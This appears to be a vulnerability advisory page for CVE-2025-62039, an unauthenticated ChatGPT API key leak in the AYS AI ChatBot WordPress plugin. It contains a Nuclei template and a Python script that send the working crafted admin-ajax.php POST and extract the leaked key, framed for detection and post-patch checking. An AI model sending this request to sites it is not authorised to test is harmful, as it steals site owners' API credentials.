AI ChatBot with ChatGPT by AYS <= 2.6.6 - Unauthenticated API Key Exposure
CVE-2025-62039
Verified
Description
AYS AI ChatBot with ChatGPT and Content Generator for WordPress, in versions up to and including 2.6.6, discloses the site's configured ChatGPT API key to unauthenticated visitors (CWE-201, insertion of sensitive information into sent data). The plugin's ays_chatgpt_admin_ajax handler can be invoked through wp-admin/admin-ajax.php without logging in, and its get_chatgpt_api_key function returns the key in the JSON response, so a single crafted POST is enough to retrieve a secret the attacker can then spend against the site owner's API account.
Severity
High
Published Date
April 22, 2026
Template Author
pussycat0x
CVE-2025-62039.yaml
id: CVE-2025-62039

info:
  name: AI ChatBot with ChatGPT by AYS <= 2.6.6 - Unauthenticated API Key Exposure
  author: pussycat0x
  severity: high
  description: |
    AYS AI ChatBot with ChatGPT and Content Generator <= 2.6.6 contains an insertion of sensitive information into sent data vulnerability caused by improper handling of embedded sensitive data, letting attackers retrieve sensitive information, exploit requires crafted input.
  impact: Attackers can retrieve embedded sensitive information, potentially leading to data leakage and privacy violations.
  remediation: Update to the latest version beyond 2.6.6.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ays-chatgpt-assistant/ai-chatbot-with-chatgpt-and-content-generator-by-ays-266-unauthenticated-information-exposure
  metadata:
    verified: true
    max-request: 1
  tags: cve,cve2025,wordpress,wp-plugin,ays-chatgpt-assistant

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=ays_chatgpt_admin_ajax&function=get_chatgpt_api_key

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "success\":true")'
          - 'contains(body, "api_key")'
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
        condition: and

    extractors:
      - type: json
        name: api_key
        json:
          - '.data.api_key'
# digest: 490a00463044022007d06b9472c223651fcb31380c476042becbef9dccb81772b40db1773b35c6e402200ac6a0dddd497a0797b264eef40b61cf750c2e1e14e96e4d6faa076716024975:922c64590222798bb761d5b6d8e72950
Remediation Steps
Update the plugin to a version later than 2.6.6, then repeat the request shown in the template to confirm that admin-ajax.php no longer returns the key to an unauthenticated request.
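The following Python script is an added example and is not part of the Nuclei template or of the AYS plugin. It reproduces the template's probe in plain Python (the same unauthenticated POST, the same four matcher conditions joined with and, and the same .data.api_key extraction) and adds the check a practitioner wants after the remediation step: reading the plugin's public readme.txt to see whether the installed version is still at or below 2.6.6. Two assumptions are made: the plugin directory slug is ays-chatgpt-assistant (taken from the reference URL), and the sample JSON responses in the block are constructed, not captured from a real site, so the matcher logic can be exercised offline.

```python
"""Plain-Python reproduction of the CVE-2025-62039 Nuclei probe plus a
readme-based version check. Added example; not the template's or the
plugin's own code. Assumed: plugin slug `ays-chatgpt-assistant`.
"""
import json
import re
import urllib.error
import urllib.request

AJAX_PATH = "/wp-admin/admin-ajax.php"
AJAX_BODY = "action=ays_chatgpt_admin_ajax&function=get_chatgpt_api_key"
PLUGIN_SLUG = "ays-chatgpt-assistant"        # assumed, from the advisory URL
LAST_VULNERABLE = (2, 6, 6)

# Constructed sample responses (not real captures) used for the offline self-check.
SAMPLE_LEAK = '{"success":true,"data":{"api_key":"sk-constructed-example-key"}}'
SAMPLE_DENIED = '{"success":false,"data":"Unauthorized"}'


def matches(status: int, content_type: str, body: str) -> bool:
    """Same four conditions as the template's DSL matcher, joined with `and`."""
    return (
        status == 200
        and "application/json" in content_type
        and 'success":true' in body
        and "api_key" in body
    )


def extract_api_key(body: str):
    """Same as the template's JSON extractor `.data.api_key`; None if absent."""
    try:
        doc = json.loads(body)
    except ValueError:
        return None
    data = doc.get("data") if isinstance(doc, dict) else None
    return data.get("api_key") if isinstance(data, dict) else None


def check_response(status: int, content_type: str, body: str):
    """Return the leaked key when the response matches the template, else None."""
    if not matches(status, content_type, body):
        return None
    return extract_api_key(body)


def probe(base_url: str, timeout: float = 10.0):
    """Send the template's POST with no cookie or nonce to a live site.

    A key in the reply means the handler answers unauthenticated callers.
    Only run this against sites you are authorised to test.
    """
    req = urllib.request.Request(
        base_url.rstrip("/") + AJAX_PATH,
        data=AJAX_BODY.encode(),
        headers={"Content-Type": "application/x-www-form-urlencoded"},
        method="POST",
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            status, ctype = resp.status, resp.headers.get("Content-Type", "")
            body = resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:        # non-2xx replies still carry a body
        status, ctype = err.code, err.headers.get("Content-Type", "")
        body = err.read().decode("utf-8", "replace")
    return check_response(status, ctype, body)


def parse_stable_tag(readme_text: str):
    """Version tuple from the `Stable tag:` line of a WordPress plugin readme.txt."""
    m = re.search(r"^Stable tag:\s*v?(\d+(?:\.\d+)*)", readme_text, re.M | re.I)
    return tuple(int(p) for p in m.group(1).split(".")) if m else None


def is_affected(version) -> bool:
    """True for any version up to and including 2.6.6."""
    return version is not None and version <= LAST_VULNERABLE


def fetch_version(base_url: str, timeout: float = 10.0):
    """Read the plugin's public readme.txt (assumed slug) and return its version."""
    url = f"{base_url.rstrip('/')}/wp-content/plugins/{PLUGIN_SLUG}/readme.txt"
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return parse_stable_tag(resp.read().decode("utf-8", "replace"))
    except OSError:                              # includes urllib.error.URLError
        return None


if __name__ == "__main__":
    import sys
    if len(sys.argv) < 2:
        print("offline self-check, leaked key:", check_response(200, "application/json", SAMPLE_LEAK))
    else:
        ver = fetch_version(sys.argv[1])
        print("plugin version:", ver, "(affected)" if is_affected(ver) else "")
        print("key exposed" if probe(sys.argv[1]) else "no key returned")
```

Run it with no arguments for the offline self-check, or with a base URL such as https://example.test to probe a site you own. The version check is a convenience only: readme.txt can be blocked or stale, so the authoritative post-patch test is the probe returning no key.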